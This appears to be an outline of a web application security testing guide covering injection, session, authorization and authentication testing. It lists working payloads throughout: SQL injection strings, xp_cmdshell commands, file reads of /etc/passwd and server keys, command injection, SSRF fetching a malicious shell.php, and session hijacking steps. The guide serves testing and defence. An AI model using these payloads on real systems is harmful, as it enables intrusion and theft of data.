- Hackproofing Oracle Application Server (A Guide to Securing Oracle 9)
- Oracle PL/SQL Injection
-
Testing for MySQL
-
How to Test
-
Versions
- From Version 4.0: UNION
- From Version 4.1: Subqueries
- From Version 5.0: Stored procedures, Stored functions and the view named INFORMATION_SCHEMA
- From Version 5.0.2: Triggers
-
The Single Quotes Problem
- 1. Web app escapes single quotes ' => \'
- 2. Web app does not escape single quotes ' => '
-
Multiple Mixed Queries
- 1 ; update tablename set code='javascript code' where 1 --
-
Information Gathering
- Fingerprinting MySQL
- 1 /*! and 1=0 */
- 1. By using the global variable @@version
- 2. By using the function VERSION()
- 3. By using comment fingerprinting with a version number /*!40110 and 1=0*/
- Login User
- 1. USER(): the user connected to the MySQL Server.
- 2. CURRENT_USER(): the internal user who is executing the query.
- Database Name in Use
- 1 AND 1=0 UNION SELECT DATABASE()
- 1 AND DATABASE() like 'db%'
- INFORMATION_SCHEMA
-
Attack Vectors
- Write in a File
- Select * from table into outfile '/tmp/file'
- Read from a File
- load_file('filename')
- Standard SQL Injection Attack
- Out of Band SQL Injection
- Blind SQL Injection
-
Tools
- Francois Larouche: Multiple DBMS SQL Injection tool
- Reversing.org - sqlbftools
- Bernardo Damele A. G.: sqlmap, automatic SQL injection tool
- Muhaimin Dzulfakar: MySqloit, MySql Injection takeover tool
-
References
- Chris Anley: “Hackproofing MySQL”
-
Case Studies
- Zeelock: Blind Injection in MySQL Databases
-
Testing for SQL Server
-
How to Test
-
SQL Server Characteristics
- comment operator: --
- query separator: ;
- xp_cmdshell
- xp_regread
- xp_regwrite
- sp_makewebtask
- xp_sendmail
-
Example 1: Testing for SQL Injection in a GET Request
- https://vulnerable.web.app/login.asp?Username='%20or%20'1'='1&Password='%20or%20'1'='1
-
Example 2: Testing for SQL Injection in a GET Request
- https://vulnerable.web.app/list_report.aspx?number=001%20UNION%20ALL%201,1,'a',1,1,1%20FROM%20users;--
-
Example 3: Testing in a POST Request
- The error message obtained when a '
-
Example 4: Yet Another (Useful) GET Example
- a' ; master.dbo.xp_cmdshell ' copy c:\inetpub\wwwroot\login.aspx c:\inetpub\wwwroot\login.txt';--
- Example 5: Custom `xp_cmdshell`
-
Example 6: Referer / User-Agent
- Referer: https://vulnerable.web.app/login.aspx', 'user_agent', 'some_ip'); [SQL CODE]--
- User-Agent: user_agent', 'some_ip'); [SQL CODE]--
-
Example 7: SQL Server as a Port Scanner
- select * from OPENROWSET('SQLOLEDB','uid=sa;pwd=foobar;Network=DBMSSOCN;Address=x.y.w.z,p;timeout=5','select 1')--
- Example 8: Upload of Executables
-
Blind SQL Injection Attacks
- Trial and Error
- If Multiple Error Messages Displayed
- Timing Attacks
- Checking for Version and Vulnerabilities
-
Example 9: Bruteforce of Sysadmin Password
- select * from OPENROWSET('SQLOLEDB','';'sa';'<pwd>','select 1;waitfor delay ''0:0:5'' ')
-
Tools
- Bernardo Damele A. G.: sqlmap, automatic SQL injection tool
-
References
- David Litchfield: “Data-mining with SQL Injection and Inference”
- Chris Anley, “(more) Advanced SQL Injection”
- Steve Friedl’s Unixwiz.net Tech Tips: “SQL Injection Attacks by Example”
- Alexander Chigrik: “Useful undocumented extended stored procedures”
- Antonin Foller: “Custom xp_cmdshell, using shell object”
- SQL Injection
- Cesar Cerrudo: Manipulating Microsoft SQL Server Using SQL Injection
-
Testing PostgreSQL
-
How to Test
-
Identifying PostgreSQL
- Examples
- http://www.example.com/store.php?id=1 AND 1::int=1
- http://www.example.com/store.php?id=1 UNION ALL SELECT NULL,version(),NULL LIMIT 1 OFFSET 1--
-
Blind Injection
- String Length LENGTH(str)
- Extract a substring from a given string SUBSTR(str,index,offset)
- String representation with no single quotes CHR(104)||CHR(101)||CHR(108)||CHR(108)||CHR(111)
-
Single Quote Unescape
- chr(n) : Returns the character whose ASCII value corresponds to the number n
- ascii(n) : Returns the ASCII value which corresponds to the character n
-
Attack Vectors
- Current User
- SELECT user
- SELECT current_user
- SELECT session_user
- SELECT usename FROM pg_user
- SELECT getpgusername()
- Current Database
- http://www.example.com/store.php?id=1 UNION ALL SELECT current_database(),NULL,NULL--
- Reading from a File
- COPY statement
- pg_read_file() internal function (starting from PostgreSQL 8.1)
- COPY
- /store.php?id=1; CREATE TABLE file_store(id serial, data text)--
- /store.php?id=1; COPY file_store(data) FROM '/var/lib/postgresql/.psql_history'--
- pg_read_file()
- SELECT pg_read_file('server.key',0,1000);
- Writing to a File
- /store.php?id=1; COPY file_store(data) TO '/var/lib/postgresql/copy_output'--
- Shell Injection
-
References
- Testing for SQL Injection
- SQL Injection Prevention Cheat Sheet
- PostgreSQL Official Documentation
- Bernardo Damele and Daniele Bellucci: sqlmap, a blind SQL injection tool
-
Testing for MS Access
-
How to Test
-
Fingerprinting
- single quote, double quote,
-
Basic Testing
- No comments characters
- No stacked queries
- No LIMIT operator
- No SLEEP or BENCHMARK alike operators
- http://www.example.com/page.asp?user=admin'%00&pass=foo
- http://www.example.com/page.app?user=admin'%16&pass=foo
-
Attributes Enumeration
- ' GROUP BY Id%00
-
Obtaining Database Schema
- http://www.example.com/page.app?id=1'+UNION+SELECT+1+FROM+name.table%00
-
Blind SQL Injection Testing
- http://www.example.com/index.php?myId=[sql]
-
References
- MS Access SQL injection cheet sheet
- Access Through Access - Brett Moore
- Access SQL Injection - Brett Moore
- MS Access: Functions
- Microsoft Access - Wikipedia
-
Testing for NoSQL Injection
-
How to Test
-
NoSQL Injection Vulnerabilities in MongoDB
- Example 1
- characters were passed unsanitized, it would trigger a database error.
- ' " \ ; { }
- Example 2
- $where: function() { //arbitrary JavaScript here }
-
References
- Injection Payloads
- Whitepapers
- Bryan Sullivan from Adobe: “Server-Side JavaScript Injection”
- Bryan Sullivan from Adobe: “NoSQL, But Even Less Security”
- Erlend from Bekk Consulting: “[Security] NOSQL-injection”
- Felipe Aragon from Syhunt: “NoSQL/SSJS Injection”
- MongoDB Documentation: “How does MongoDB address SQL or Query injection?”
- PHP Documentation: “MongoCollection::find”
- Hacking NodeJS and MongoDB
- Attacking NodeJS and MongoDB
-
Testing for ORM Injection
-
How to Test
- Identify the ORM Layer
-
Abusing the ORM Layer
- Weak ORM Implementation
- Vulnerable ORM Layer
-
References
- Wikipedia - ORM
- New Methods for Exploiting ORM Injections in Java Applications (HITB16)
- HITB2016 Slides - ORM Injections in Java Applications]
- Fixing SQL Injection: ORM is not enough
- PayloadAllTheThings - HQL Injection
-
Testing for Client-side
-
Objectives
- The following test scenario will validate that proper input validation is conducted.
-
How to Test
-
Identify the Usage of Web SQL DB
- openDatabase()
- transaction()
- executeSQL()
-
Web SQL DB Injection
- Bypassing Conditions
-
Remediation
- Follow the same remediation from the Testing for SQL Injection’s Remediation Section.
-
References
- W3C Web SQL Database
- Apple’s JavaScript Database Tutorial
- Tutorialspoint HTML5 Web SQL Database
- Portswigger’s Client-Side SQL Injection
-
Testing for LDAP Injection
-
Objectives
- Identify LDAP injection points.
- Assess the severity of the injection.
-
How to Test
-
Example 1: Search Filters
- searchfilter="(cn="+user+")"
-
Example 2: Login
- searchlogin= "(&(uid="+user+")(userpassword={md5}"+base64(pack("h*"md5(pass)))+"))";
-
Tools
- Softerra LDAP Browser
-
References
- LDAP Injection Prevention Cheat Sheet
-
Whitepapers
- Sacha Faust: LDAP Injection: Are Your Applications Vulnerable?
- IBM paper: Understanding LDAP
- RFC 1960: A String Representation of LDAP Search Filters
- LDAP injection
-
Testing for XML Injection
-
Objectives
- Identify XML injection points.
- Assess the types of exploits that can be attained and their severities.
-
How to Test
-
Discovery
- Single quote: '
- Double quote: "
- Angular parentheses: > and <
- Comment tag: <!--/-->
- Ampersand: &
- CDATA section delimiters: <!\[CDATA\[ / ]]>
- Tag Injection
- Source Code Review
-
Tools
- XML Injection Fuzz Strings (wfuzz tool)
-
References
- XML Injection
- Gregory Steuck, “XXE (Xml eXternal Entity) attack”
- OWASP XXE Prevention Cheat Sheet
-
Testing for SSI Injection
-
Objectives
- Identify SSI injection points.
- Assess the severity of the injection.
-
How to Test
- First determine if the web server supports SSI directives
- The next step is determining all the possible user input vectors and testing to see if the SSI injection is exploitable.
-
Tools
- Web Proxy Burp Suite
- OWASP ZAP
- String searcher: grep
-
References
- Nginx SSI module
- Apache: Module mod_include
- IIS: Server Side Includes directives
- Apache Tutorial: Introduction to Server Side Includes
- Apache: Security Tips for Server Configuration
- SSI Injection instead of JavaScript Malware
- IIS: Notes on Server-Side Includes (SSI) syntax
- Header Based Exploitation
-
Testing for XPath Injection
-
Objectives
- Identify XPATH injection points.
-
How to Test
- If the application does not properly filter user input, the tester will be able to inject XPath code and interfere with the query result.
-
References
- Amit Klein: “Blind XPath Injection”
- XPath 1.0 specifications
-
Testing for IMAP SMTP Injection
-
Objectives
- Identify IMAP/SMTP injection points.
- Understand the data flow and deployment structure of the system.
- Assess the injection impacts.
-
How to Test
- Identifying Vulnerable Parameters
- Understanding the Data Flow and Deployment Structure of the Client
- IMAP/SMTP Command Injection
-
References
- RFC 0821 “Simple Mail Transfer Protocol”
- RFC 3501 “Internet Message Access Protocol - Version 4rev1”
- Vicente Aguilera Díaz: “MX Injection: Capturing and Exploiting Hidden Mail Servers”
-
Testing for Command Injection
-
Objectives
- Identify and assess the command injection points.
-
How to Test
- http://sensitive/something.php?dir=%3Bcat%20/etc/passwd
-
Special Characters for Comand Injection
- cmd1|cmd2 : Uses of | will make command 2 to be executed weather command 1 execution is successful or not.
- cmd1;cmd2 : Uses of ; will make command 2 to be executed weather command 1 execution is successful or not.
- cmd1||cmd2 : Command 2 will only be executed if command 1 execution fails.
- cmd1&&cmd2 : Command 2 will only be executed if command 1 execution succeeds.
- $(cmd) : For example, echo $(whoami) or $(touch test.sh; echo 'ls' > test.sh)
- cmd : It’s used to execute specific command. For example, whoami
- >(cmd) : >(ls)
- <(cmd) : <(ls)
-
Code Review Dangerous API
-
Java
- Runtime.exec()
-
C/C++
- system
- exec
- ShellExecute
-
Python
- exec
- eval
- os.system
- os.popen
- subprocess.popen
- subprocess.call
-
PHP
- system
- shell_exec
- exec
- proc_open
- eval
-
Remediation
- Sanitization
- Permissions
-
Tools
- OWASP WebGoat
- Commix
-
References
- Penetration Testing for Web Applications (Part Two)
- OS Commanding
- CWE-78: Improper Neutralization of Special Elements used in an OS Command (‘OS Command Injection’)
- ENV33-C. Do not call system()
-
Testing for Format String Injection
-
Objectives
- Assess whether injecting format string conversion specifiers into user-controlled fields causes undesired behaviour from the application.
-
Static Analysis
- C and C++: Flawfinder
- Java: FindSecurityBugs rule FORMAT_STRING_MANIPULATION
- PHP: String formatter Analyzer in phpsa
- Manual Code Inspection
- Conversion Specifier Injection
-
Testing for Incubated Vulnerability
-
Objectives
- Identify injections that are stored and require a recall step to the stored injection.
- Understand how a recall step could occur.
- Set listeners or activate the recall step if possible.
-
How to Test
-
Black-Box Testing
- File Upload Example
- XSS Example on a Bulletin Board
- SQL Injection Example
- Misconfigured Server
-
Gray-Box Testing
- Examining input validation is key in mitigating against this vulnerability.
- To combat the back door issue for client-side attacks, output validation must also be employed
-
Tools
- XSS-proxy
- OWASP Zed Attack Proxy (ZAP)
- Burp Suite
- Metasploit
-
Whitepapers
- Web Application Security Consortium “Threat Classification, Cross-site scripting”
-
Testing for HTTP Splitting Smuggling
-
Objectives
- Assess if the application is vulnerable to splitting, identifying what possible attacks are achievable.
- Assess if the chain of communication is vulnerable to smuggling, identifying what possible attacks are achievable.
-
How to Test
-
Black-Box Testing
- HTTP Splitting
-
Gray-Box Testing
- HTTP Splitting
- HTTP Smuggling
-
References
- Amit Klein, “Divide and Conquer: HTTP Response Splitting, Web Cache Poisoning Attacks, and Related Topics”
- Amit Klein: “HTTP Message Splitting, Smuggling and Other Animals”
- Amit Klein: “HTTP Request Smuggling - ERRATA (the IIS 48K buffer phenomenon)”
- Amit Klein: “HTTP Response Smuggling”
- Chaim Linhart, Amit Klein, Ronen Heled, Steve Orrin: “HTTP Request Smuggling”
-
Testing for HTTP Incoming Requests
-
Objectives
- Monitor all incoming and outgoing HTTP requests to the Web Server to inspect any suspicious requests.
- Monitor HTTP traffic without changes of end user Browser proxy or client-side application.
-
How to Test
-
Reverse Proxy
- 1. Install Fiddler or Charles on Web Server
- 2. Configure the Fiddler or Charles as Reverse Proxy
- 3. Capture the HTTP traffic
- 4. Inspect HTTP traffic
- 5. Modify HTTP requests and replay the modified requests for testing
-
Port Forwarding
- 1. Install the Charles or port forwarding on another machine or web Server
- 2. Configure the Charles as Socks proxy as port forwarding.
-
TCP-level Network Traffic Capture
- 1. Activate TCPDump or WireShark on Web Server to capture network traffic
- 2. Monitor the captured files (PCAP)
- 3. Edit PCAP files by Ostinato tool based on need
- 4. Reply the HTTP requests
-
Tools
- Fiddler
- TCPProxy
- Charles Web Debugging Proxy
- WireShark
- PowerEdit-Pcap
- pcapteller
- replayproxy
- Ostinato
-
References
- Charles Web Debugging Proxy
- Fiddler
- TCPDUMP
- Ostinato
-
Testing for Host Header Injection
-
Objectives
- Assess if the Host header is being parsed dynamically in the application.
- Bypass security controls that rely on the header.
-
How to Test
- X-Forwarded Host Header Bypass
- Web Cache Poisoning
- Password Reset Poisoning
-
References
- What is a Host Header Attack?
- Host Header Attack
- Practical HTTP Host Header Attacks
-
Testing for Server-side Template Injection
-
Objectives
- Detect template injection vulnerability points.
- Identify the templating engine.
- Build the exploit.
-
How to Test
-
Identify Template Injection Vulnerability
- a{{bar}}b
- a{{7*7}}
- {var} ${var} {{var}} <%var%> [% var %]
-
Identify the Templating Engine
- SSTI vulnerability and the templating engine various tools are available including Tplmap or the Backslash Powered
- Scanner Burp Suite extension.
-
Build the RCE Exploit
- For template authors sections covering basic syntax.
- Security considerations sections.
- Lists of built-in methods, functions, filters, and variables.
- Lists of extensions/plugins.
-
Tools
- Tplmap
- Backslash Powered Scanner Burp Suite extension
- Template expression test strings/payloads list
-
References
- James Kettle: Server-Side Template Injection:RCE for the modern webapp (whitepaper)
- Server-Side Template Injection
- Exploring SSTI in Flask/Jinja2
- Server Side Template Injection: from detection to Remote shell
- Extreme Vulnerable Web Application
- Divine Selorm Tsa: Exploiting server side template injection with tplmap
- Exploiting SSTI in Thymeleaf
-
Testing for Server-Side Request Forgery
-
Objectives
- Identify SSRF injection points.
- Test if the injection points are exploitable.
- Asses the severity of the vulnerability
-
How to Test
-
Load the Contents of a File
- GET https://example.com/page?page=https://malicioussite.com/shell.php
-
Access a Restricted Page
- GET https://example.com/page?page=http://localhost/admin
-
Fetch a Local File
- GET https://example.com/page?page=file:///etc/passwd
- HTTP Methods Used
-
Common Filter Bypass
- Using alternative IP representation that evaluate to 127.0.0.1 :
- Decimal notation: 2130706433
- Octal notation: 017700000001
- IP shortening: 127.1
- String obfuscation
- Registering your own domain that resolves to 127.0.0.1
- Using the @ character to separate between the userinfo and the host: https://expected-domain@attacker�domain
- URL fragmentation with the # character: https://attacker-domain#expected-domain
- URL encoding
- Fuzzing
- Combinations of all of the above
-
Remediation
- Server-Side Request Forgery Prevention Cheat Sheet
-
References
- swisskyrepo: SSRF Payloads
- Reading Internal Files Using SSRF Vulnerability
- Abusing the AWS Metadata Service Using SSRF Vulnerabilities
- OWASP Server Side Request Forgery Prevention Cheatsheet
- Portswigger: SSRF
- Portswigger: Blind SSRF
- Bugcrowd Webinar: SSRF
- Hackerone Blog: SSRF
- Hacker101: SSRF
- URI Generic Syntax
-
4.6 Session Management Testing
-
Testing for Session Management Schema
-
Objectives
- Gather session tokens, for the same user and for different users where possible.
- Analyze and ensure that enough randomness exists to stop session forging attacks.
- Modify cookies that are not signed and contain information that can be manipulated
-
How to Test
-
Black-Box Testing
- Are all Set-Cookie directives tagged as Secure ?
- Do any Cookie operations take place over unencrypted transport?
- Can the Cookie be forced over unencrypted transport?
- If so, how does the application maintain security?
- Are any Cookies persistent?
- What Expires times are used on persistent cookies, and are they reasonable?
- Are cookies that are expected to be transient configured as such?
- What HTTP/1.1 Cache-Control settings are used to protect Cookies?
- What HTTP/1.0 Cache-Control settings are used to protect Cookies?
- Cookie Collection
- How many cookies are used by the application?
- Which parts of the application generate or modify the cookie?
- Which parts of the application require this cookie in order to be accessed and utilized?
- Session Analysis
- Token Structure & Information Leakage
- Hex
- Base64
- MD5
- What parts of the Session ID are static?
- What clear-text confidential information is stored in the Session ID?
- What information can be deduced from the structure of the Session ID?
- What portions of the Session ID are static for the same log in conditions?
- What obvious patterns are present in the Session ID as a whole, or individual portions?
- Session ID Predictability and Randomness
- Are the Session IDs provably random in nature? Can the resulting values be reproduced?
- Do the same input conditions produce the same ID on a subsequent run?
- Are the Session IDs provably resistant to statistical or cryptanalysis?
- What elements of the Session IDs are time-linked?
- What portions of the Session IDs are predictable?
- Can the next ID be deduced, given full knowledge of the generation algorithm and previous IDs?
- Cookie Reverse Engineering
- What character set is used in the cookie?
- Is the cookie composed of different sub-parts carrying different pieces of information?
- Brute Force Attacks
- How long would a brute-force attack on all possible Session IDs take?
- Is the Session ID space large enough to prevent brute forcing?
- Do delays between connection attempts with different Session IDs mitigate the risk of this attack?
-
Gray-Box Testing
- Random Session Token
- Token length
- Session Time-out
- Cookie configuration
- non-persistent: only RAM memory
- secure (set only on HTTPS channel):
- HTTPOnly (not readable by a script)
-
Tools
- OWASP ZAP
- Burp Sequencer
- YEHG’s JHijack
-
References
- RFC 2965 “HTTP State Management Mechanism”
- RFC 1750 “Randomness Recommendations for Security”
- Michal Zalewski: “Strange Attractors and TCP/IP Sequence Number Analysis” (2001)
- Michal Zalewski: “Strange Attractors and TCP/IP Sequence Number Analysis
- Correlation Coefficient
- ENT
- DMA[2005-0614a] - ‘Global Hauri ViRobot Server cookie overflow’
- Gunter Ollmann: “Web Based Session Management”
- OWASP Code Review Guide
-
Testing for Cookies Attributes
-
Objectives
- Ensure that the proper security configuration is set for cookies.
-
How to Test
-
Cookie Attributes
- The Secure attribute tells the browser to only send the cookie if the request is being sent over a secure channel such
as HTTPS
- The HttpOnly attribute is used to help prevent attacks such as session leakage, since it does not allow the cookie to
be accessed via a client-side script such as JavaScript
- The Domain attribute is used to compare the cookie’s domain against the domain of the server for which the HTTP
request is being made.
- The Path attribute plays a major role in setting the scope of the cookies in conjunction with the domain .
- The Expires attribute is used to:
1. set persistent cookies
2. limit lifespan if a session lives for too long
3. remove a cookie forcefully by setting it to a past date
- The SameSite attribute is used to assert that a cookie ought not to be sent along with cross-site requests.
- The Strict value is the most restrictive usage of SameSite , allowing the browser to send the cookie only to first-party
context without top-level navigation.
- The Lax value is less restrictive than Strict .
- The None value specifies that the browser will send the cookie on cross-site requests
-
Cookie Prefixes
- The __Host- prefix expects cookies to fulfill the following conditions:
1. The cookie must be set with the Secure attribute.
2. The cookie must be set from a URI considered secure by the user agent.
3. Sent only to the host who set the cookie and MUST NOT include any Domain attribute.
4. The cookie must be set with the Path attribute with a value of / so it would be sent to every request to the host.
- The __Secure- prefix is less restrictive and can be introduced by adding the case-sensitive string __Secure- to the
cookie name. Any cookie that matches the prefix __Secure- would be expected to fulfill the following conditions:
1. The cookie must be set with the Secure attribute.
2. The cookie must be set from a URI considered secure by the user agent.
-
Strong Practices
- Putting all this together, we can define the most secure cookie attribute configuration as: Set-Cookie: __Host-SID=
<session token>; path=/; Secure; HttpOnly; SameSite=Strict .
-
Tools
- OWASP Zed Attack Proxy Project
- Web Proxy Burp Suite
-
Browser Plug-in
- Tamper Data for FF Quantum
- “FireSheep” for FireFox
- “EditThisCookie” for Chrome
- “Cookiebro - Cookie Manager” for FireFox
-
References
- RFC 2965 - HTTP State Management Mechanism
- RFC 2616 – Hypertext Transfer Protocol – HTTP 1.1
- Same-Site Cookies - draft-ietf-httpbis-cookie-same-site-00
- The important “expires” attribute of Set-Cookie
- HttpOnly Session ID in URL and Page Body
-
Testing for Session Fixation
-
Objectives
- Analyze the authentication mechanism and its flow.
- Force cookies and assess the impact.
-
How to Test
- make a request to the site to be tested
- obtain the response
- As no new cookie has been issued upon a successful authentication, the tester knows that it is possible to perform
session hijacking unless the integrity of the session cookie is ensured.
-
Test with Forced Cookies
- 1. Reach the login page of the website.
- Save a snapshot of the cookie jar before logging in,
- excluding cookies which contain the __Host- or __Secure�prefix in their name.
- Login to the website as the victim and reach any page offering a secure function requiring authentication.
- Set the cookie jar to the snapshot taken at step 2.
- Trigger the secure function identified at step 3.
- Observe whether the operation at step 5 has been performed successfully.
- Clear the cookie jar, login as the attacker and reach the page at step 3
- Write in the cookie jar, one by one, the cookies saved at step 2
- Trigger again the secure function identified at step 3.
- Clear the cookie jar and login again as the victim.
- Observe whether the operation at step 9 has been performed successfully
-
Remediation
- Implement a session token renewal after a user successfully authenticates.
-
Tools
- OWASP ZAP
-
References
- Session Fixation
- ACROS Security
- Chris Shiflett
-
Testing for Exposed Session Variables
-
Objectives
- Ensure that proper encryption is implemented.
- Review the caching configuration.
- Assess the channel and methods’ security.
-
How to Test
-
Testing for Encryption & Reuse of Session Tokens Vulnerabilities
- If the Session ID could be presented by an attacker to the application to gain access, then it must be protected in transit
to mitigate that risk.
-
Testing for Proxies & Caching Vulnerabilities
- In general, the Session ID should never be sent over unencrypted transport and should never be cached.
- The application should also be configured to secure data in caches over both HTTP/1.0 and HTTP/1.1
-
Testing for GET & POST Vulnerabilities
- In general, GET requests should not be used, as the Session ID may be exposed in Proxy or Firewall logs.
- All server-side code receiving data from POST requests should be tested to ensure it does not accept the data if sent as
a GET.
-
Testing for Transport Vulnerabilities
- How are Session IDs transferred? e.g., GET, POST
- Are Session IDs always sent over encrypted transport by default?
- s it possible to manipulate the application to send Session IDs unencrypted? e.g., by changing HTTP to HTTPS?
- What cache-control directives are applied to requests/responses passing Session IDs?
- Are these directives always present? If not, where are the exceptions?
- Are GET requests incorporating the Session ID used?
- If POST is used, can it be interchanged with GET?
-
References
- RFCs 2109 & 2965 – HTTP State Management Mechanism
- RFC 2616 – Hypertext Transfer Protocol
-
Testing for Cross Site Request Forgery
-
Objectives
- Determine whether it is possible to initiate requests on a user’s behalf that are not initiated by the user.
-
How to Test
- PortSwigger
-
Remediation
- OWASP CSRF Prevention Cheat Sheet
-
Tools
- OWASP ZAP
- CSRF tester
- Pinata-csrf-tool
-
References
- Peter W: “Cross-Site Request Forgeries”
- Thomas Schreiber: “Session Riding”
- Oldest known post
- Cross-site Request Forgery FAQ
- A Most-Neglected Fact About CSRF
- Multi-POST CSRF
- Complete Application pwnage via Multi POST XSRF
-
Testing for Logout Functionality
-
Objectives
- Assess the logout UI.
- Analyze the session timeout and if the session is properly killed after logout.
-
How to Test
-
Testing for Log Out User Interface
- Verify the appearance and visibility of the log out functionality in the user interface.
-
Testing for Server-Side Session Termination
- store the values of cookies that are used to identify a session
- invoke the log out function and observe the behavior of the application
- navigate to a page that is only visible in an
authenticated session "back" button
- If a cached version of the page is displayed reload the page
- If the log out function causes session cookies to be set to a new value, restore the old value of the session cookies and reload a page from the authenticated area of the application.
-
Testing for Session Timeout
- Try to determine a session timeout by performing requests to a page in the authenticated area of the web application
with increasing delays.
-
Testing for Session Termination in SSO
- Perform a log out in the tested application.
- Verify if there is a application directory which allows the user to log back in to the application without authentication.
- Test if the application requests the user to authenticate, if the URL of an entry point to the application is requested.
- perform a log out in the
SSO system
- Then try to access an authenticated area
-
Tools
- Burp Suite - Repeater
-
References
- Cookie replay attacks in ASP.NET when using forms authentication
-
Testing Session Timeout
-
Objectives
- Identify vulnerable session cookies.
- Hijack vulnerable cookies and assess the risk level.
-
How to Test
- Login to the website as the victim and reach any page offering a secure function requiring authentication.
- Delete from the cookie jar all the cookies which satisfy any of the following conditions.
- Save a snapshot of the cookie jar.
- Trigger the secure function identified at step 1.
- Observe whether the operation at step 4 has been performed successfully. If so, the attack was successful.
- Clear the cookie jar, login as the attacker and reach the page at step 1.
- Write in the cookie jar, one by one, the cookies saved at step 3.
- Trigger again the secure function identified at step 1.
- Clear the cookie jar and login again as the victim.
- Observe whether the operation at step 8 has been performed successfully in the victim’s account.
-
Tools
- OWASP ZAP
- JHijack - a numeric session hijacking tool
- Subtopic 4
-
Testing for Session Puzzling
-
Objectives
- Identify all session variables.
- Break the logical flow of session generation.
-
How to Test
-
Black-Box Testing
- This vulnerability can be detected and exploited by enumerating all of the session variables used by the application and in which context they are valid.
-
Gray-Box Testing
- The most effective way to detect these vulnerabilities is via a source code review.
-
Remediation
- Session variables should only be used for a single consistent purpose.
-
References
- Session Puzzles
- Session Puzzling and Session Race Conditions
-
Testing for Session Hijacking
-
Objectives
- Identify vulnerable session cookies.
- Hijack vulnerable cookies and assess the risk level.
-
How to Test
- 1. Login to the website as the victim and reach any page offering a secure function requiring authentication.
- 2. Delete from the cookie jar all the cookies which satisfy any of the following conditions.
- in case there is no HSTS adoption: the Secure attribute is set.
- in case there is partial HSTS adoption: the Secure attribute is set or the Domain attribute is not set.
- 3. Save a snapshot of the cookie jar.
- 4. Trigger the secure function identified at step 1.
- 5. Observe whether the operation at step 4 has been performed successfully. If so, the attack was successful.
- 6. Clear the cookie jar, login as the attacker and reach the page at step 1.
- 7. Write in the cookie jar, one by one, the cookies saved at step 3.
- 8. Trigger again the secure function identified at step 1.
- 9. Clear the cookie jar and login again as the victim.
- 10. Observe whether the operation at step 8 has been performed successfully in the victim’s account. If so, the attack
- was successful; otherwise, the site is secure against session hijacking.
-
Tools
- OWASP ZAP
- JHijack - a numeric session hijacking tool
-
4.5 Authorization Testing
-
Testing Directory Traversal File Include
-
Objectives
- Identify injection points that pertain to path traversal.
- Assess bypassing techniques and identify the extent of path traversal.
-
How to Test
-
Black-Box Testing
- Input Vectors Enumeration
- Are there request parameters which could be used for file-related operations?
- Are there unusual file extensions?
- Are there interesting variable names? file = , home= , item=
- Is it possible to identify cookies used by the web application for the dynamic generation of pages or templates?
- Testing Techniques
- Testing for Path Traversal
- item=../../../../etc/passwd
- Cookie: USER=1826cc8f:PSTYLE=../../../../etc/passwd
- file=http://www.owasp.org/malicioustxt
- file=file:///etc/passwd
- file=http://localhost:8080
-
Gray-Box Testing
- During a source code review, they can use simple tools (such as the grep command) to search for one or more common patterns within the application code
- PHP: include(), include_once(), require(), require_once(), fopen(), readfile(), ...
- JSP/Servlet: java.io.File(), java.io.FileReader(), ...
- ASP: include file, include virtual, ...
-
Tools
- DotDotPwn
- Path Traversal Fuzz Strings WFUZZ
- OWASP ZAP
- Burp Suite
- Enconding/Decoding tools
- String searcher “grep”
- DirBuster
-
References
- phpBB Attachment Mod Directory Traversal HTTP POST Injection
- Windows File Pseudonyms: Pwnage and Poetry
-
Testing for Bypassing Authorization Schema
-
Objectives
- Assess if horizontal or vertical access is possible.
-
How to Test
-
Testing for Horizontal Bypassing Authorization Schema
- Is it possible to access resources that should be accessible to a user that holds a different identity with the same role or privilege?
- Is it possible to operate functions on resources that should be accessible to a user that holds a different identity?
- Test for IDORs
-
Testing for Vertical Bypassing Authorization Schema
- Access resources that should be accessible only to a higher role user.
- Operate functions on resources that should be operative only by a user that holds a higher or specific role identity.
- Test for IDORs
-
Testing for Access to Administrative Functions
- What happens if a non-administrative user tries to execute that request?
- Will the user be created?
- If so, can the new user use their privileges?
- Testing for Access to Resources Assigned to a Different Role
-
Testing for Special Request Header Handling
- Some applications support non-standard headers such as X-Original-URL or X-Rewrite-URL in order to allow
overriding the target URL in requests with the one specified in the header value.
-
Remediation
- Employ the least privilege principles on the users, roles, and resources to ensure that no unauthorized access occurs.
-
Tools
- ZAP add-on: Access Control Testing
- Burp extension: Autorize
- Burp extension: AuthMatrix
-
References
- OWASP Application Security Verification Standard 4.0.1
-
Testing for Privilege Escalation
-
Objectives
- Identify injection points related to privilege manipulation.
- Fuzz or otherwise attempt to bypass security measures.
-
How to Test
-
Testing for Role/Privilege Manipulation
- Manipulation of User Group
- groupID=grp001&orderID=0001
- Manipulation of User Profile
- What if the tester modifies the value of the variable profile to SysAdmin ? Is it possible to become administrator?
- Manipulation of Condition Value
- verify that it is not possible to escalate privileges by modifying the parameter values.
- Manipulation of IP Address
- change the IP value of the X-forwarded-For HTTP header to workaround the IP source identification.
-
URL Traversal
- /../.././userInfo.html
- WhiteBox
-
Weak SessionID
- MD5(Password + UserID) as sessionID
-
Tools
- OWASP Zed Attack Proxy (ZAP)
-
References
- Wikipedia - Privilege Escalation
-
Testing for IDOR
-
Objectives
- Identify points where object references may occur.
- Assess the access control measures and if they’re vulnerable to IDOR.
-
How to Test
- The Value of a Parameter Is Used Directly to Retrieve a Database Record "try to modify it"
- The Value of a Parameter Is Used Directly to Perform an Operation in the System
- The Value of a Parameter Is Used Directly to Retrieve a File System Resource "see path traversal"
- The Value of a Parameter Is Used Directly to Access Application Functionality
-
References
- Top 10 2013-A4-Insecure Direct Object References
-
4.4 Authentication Testing
-
Credentials Transported over an Encrypted Channel
-
Objectives
- Assess whether any use case of the web site or application causes the server or the client to exchange credentials without encryption.
-
How to Test
- Set up and start a tool to capture traffic
- Disable any features or plugins that make the web browser favour HTTPS. such as "HTTPS Everywhere"
-
In the captured traffic, look for sensitive data
- Passphrases or passwords, usually inside a message body
- Tokens, usually inside cookies
- Account or password reset codes
-
Login
- If the login page is normally HTTPS, attempt to remove the “S” to see if the login page loads as HTTP.
- Look for the Secure keyword in the response header on cookie header.
-
Account Creation
- If there is a Set-Cookie: , verify it has a Secure; attribute as well.
-
if the web application has features that allow a user to change an account or call a different service with credentials
- Forms that allow users to handle a forgotten password or other credential
- Forms that allow users to edit credentials
- Forms that require the user to authenticate with another provider (for example, payment processing)
-
Accessing Resources While Logged In
- Forced browse to the HTTP version of the web site to see if the client leaks credentials.
-
Remediation
- Use HTTPS for the whole web site. Implement HSTS and redirect any HTTP to HTTPS.
-
Testing for Default Credentials
-
Objectives
- Enumerate the applications for default credentials
